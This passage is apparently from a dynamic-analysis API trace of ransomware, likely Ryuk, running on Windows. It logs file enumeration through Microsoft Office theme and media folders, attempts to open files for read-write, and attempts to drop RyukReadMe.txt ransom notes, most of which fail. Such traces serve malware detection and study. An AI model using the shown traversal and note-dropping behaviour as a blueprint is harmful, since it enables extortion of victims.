[0135.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\metro.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.624] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.624] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.624] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.624] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.624] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml", dwFileAttributes=0x80) returned 0 [0135.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\module.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.625] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.625] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.625] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.625] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml", dwFileAttributes=0x80) returned 0 [0135.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\newsprint.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.625] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.625] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.625] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.625] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.626] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml", dwFileAttributes=0x80) returned 0 [0135.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office 2.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.626] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.626] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.626] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.626] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.626] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml", dwFileAttributes=0x80) returned 0 [0135.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic 2.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.629] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.629] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.629] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.629] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.629] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml", dwFileAttributes=0x80) returned 0 [0135.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.629] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.629] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.630] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.630] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml", dwFileAttributes=0x80) returned 0 [0135.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\opulent.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.630] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.630] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.630] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.630] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml", dwFileAttributes=0x80) returned 0 [0135.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\oriel.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.631] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.631] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.631] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.631] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml", dwFileAttributes=0x80) returned 0 [0135.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\origin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.631] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.631] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.631] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.631] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml", dwFileAttributes=0x80) returned 0 [0135.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\paper.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.632] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.632] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.632] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.632] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.632] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml", dwFileAttributes=0x80) returned 0 [0135.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\perspective.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.632] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.632] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.632] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.632] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.633] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml", dwFileAttributes=0x80) returned 0 [0135.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\pushpin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.633] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.633] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.633] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.633] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml", dwFileAttributes=0x80) returned 0 [0135.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\slipstream.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.634] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.634] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.634] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.634] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml", dwFileAttributes=0x80) returned 0 [0135.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\solstice.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.635] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.635] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.636] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.636] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.636] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml", dwFileAttributes=0x80) returned 0 [0135.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\technic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.636] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.636] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.636] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.636] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.637] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml", dwFileAttributes=0x80) returned 0 [0135.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\thatch.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.637] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.637] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.637] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.637] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.637] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml", dwFileAttributes=0x80) returned 0 [0135.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\trek.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.638] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.638] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.638] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.638] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.638] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml", dwFileAttributes=0x80) returned 0 [0135.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\urban.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.639] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.639] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.639] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.639] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.639] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml", dwFileAttributes=0x80) returned 0 [0135.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\verve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.640] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.640] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.640] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.640] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml", dwFileAttributes=0x80) returned 0 [0135.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\waveform.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.641] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.641] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.641] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0135.641] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0135.642] SetLastError (dwErrCode=0x0) [0135.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.645] GetLastError () returned 0x5 [0135.645] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.645] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.645] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.645] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx", dwFileAttributes=0x80) returned 0 [0135.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\trek.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.646] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.646] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.646] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.646] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.646] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx", dwFileAttributes=0x80) returned 0 [0135.646] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\urban.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.646] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.646] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.646] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.646] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.646] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx", dwFileAttributes=0x80) returned 0 [0135.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\verve.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.647] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.647] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.647] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.647] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.647] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx", dwFileAttributes=0x80) returned 0 [0135.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\waveform.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.648] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.648] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.648] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0135.648] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0135.648] SetLastError (dwErrCode=0x0) [0135.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.648] GetLastError () returned 0x5 [0135.648] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0135.648] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.648] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0135.648] SetLastError (dwErrCode=0x0) [0135.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.648] GetLastError () returned 0x5 [0135.648] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0135.648] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.649] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0135.649] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.649] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.649] SetLastError (dwErrCode=0x0) [0135.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.649] GetLastError () returned 0x5 [0135.649] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.649] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.649] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0135.651] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.651] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.651] SetLastError (dwErrCode=0x0) [0135.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.652] GetLastError () returned 0x5 [0135.652] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0135.652] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.652] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0135.652] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.652] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.652] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.652] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 